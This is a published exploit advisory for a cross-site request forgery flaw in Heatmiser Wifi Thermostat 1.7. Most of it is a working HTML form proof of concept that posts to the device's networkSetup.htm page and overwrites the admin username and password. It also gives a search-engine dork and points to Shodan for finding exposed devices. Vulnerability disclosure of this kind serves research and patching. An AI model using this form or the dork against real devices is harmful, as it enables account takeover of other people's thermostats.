Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery

2019.01.09

SajjadBnz (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan

# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery
# Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan
# Date: 2019-01-09
# Exploit Author: sajjadbnd
# Reference : https://www.exploit-db.com/exploits/45623 but it has another vulnerability
# Vendor Lnk: https://www.heatmiser.com/en/
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
# Tested on: Heatmiser Version 1.7
# CVE: N/A
# [+] CSRF: Change Admin Username and Password
<form method="post" name="config" action="http://target:8083/networkSetup.htm">
Name:<input type="text" name="usnm" maxlength="16" value="s" onchange="textchange()">
Password:<input type="password" maxlength="16" style="width:150px;" name="usps" >
Confirm User Password:<input type="password" maxlength="16" style="width:150px;" name="cfps" onchange="textchange()">
<input id="btnSubmit" type="submit" class="sm" value=" Save " onclick="saveclick()">
</form>
#EOF

References:

https://www.exploit-db.com/exploits/45623

See this note in RAW Version

Vote for this issue:

25%

75%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery

Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.